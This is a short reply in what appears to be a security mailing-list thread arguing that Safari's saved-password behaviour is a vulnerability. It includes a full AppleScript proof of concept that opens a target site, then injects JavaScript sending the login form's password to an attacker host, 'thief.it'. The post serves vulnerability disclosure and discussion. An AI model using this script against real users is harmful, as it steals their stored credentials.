Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficent to entice a victim to execute a malicious script like that: --BOF tell application "Safari" open location "https://www.target.com"; end tell do shell script "/bin/sleep 10" tell application "Safari" do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1 end tell --EOF I agree with you in saying that the execution of malicious scripts can lead in much more dangeruos attacks, anyway i consider this a vulnerability and i dont know why Apple belives this is the correct behaviour. . . many thanks for your comment -p
